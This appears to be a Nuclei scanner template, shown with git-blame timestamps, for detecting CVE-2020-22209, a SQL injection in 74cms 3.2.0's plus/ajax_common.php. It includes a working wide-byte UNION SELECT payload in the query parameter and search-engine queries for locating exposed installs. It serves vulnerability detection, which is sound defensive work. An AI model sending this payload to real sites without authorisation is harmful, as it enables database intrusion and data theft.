2022-06-05 10:40:34 +00:00
|
|
|
id: CVE-2020-22209
|
|
|
|
|
|
|
|
info:
|
2022-06-21 13:31:04 +00:00
|
|
|
name: 74cms - ajax_common.php SQL Injection
|
2022-06-05 10:40:34 +00:00
|
|
|
author: ritikchaddha
|
|
|
|
severity: critical
|
|
|
|
description: |
|
|
|
|
SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying database.
|
2023-09-06 12:22:36 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_common.php file.
|
2022-06-05 10:40:34 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/blindkey/cve_like/issues/12
|
2022-06-10 13:38:43 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-22209
|
2024-01-29 17:11:14 +00:00
|
|
|
- https://github.com/20142995/sectool
|
|
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
2022-06-05 10:40:34 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
2023-07-11 19:49:27 +00:00
|
|
|
cve-id: CVE-2020-22209
|
2022-06-05 10:40:34 +00:00
|
|
|
cwe-id: CWE-89
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-score: 0.18558
|
|
|
|
epss-percentile: 0.96216
|
2023-09-06 12:22:36 +00:00
|
|
|
cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*
|
2022-06-05 10:40:34 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: 74cms
|
|
|
|
product: 74cms
|
2023-09-06 12:22:36 +00:00
|
|
|
shodan-query: http.html:"74cms"
|
|
|
|
fofa-query: app="74cms"
|
2022-06-05 10:40:34 +00:00
|
|
|
tags: cve,cve2020,74cms,sqli
|
2022-06-30 02:50:26 +00:00
|
|
|
variables:
|
|
|
|
num: "999999999"
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-06-05 10:40:34 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2022-06-30 02:50:26 +00:00
|
|
|
- '{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,md5({{num}}),3%23%27'
|
2022-06-05 10:40:34 +00:00
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-06-30 02:50:26 +00:00
|
|
|
- '{{md5({{num}})}}'
|
2024-06-01 06:53:00 +00:00
|
|
|
# digest: 4a0a00473045022059525c62ce6e84a6139fb32be4e0ac407b3214a0a55d0c92455379d33a54676f022100845435da58a71d7dff6dc5ef5c2318d7d51e38ac98d2eb90a62aca375f4a526b:922c64590222798bb761d5b6d8e72950
|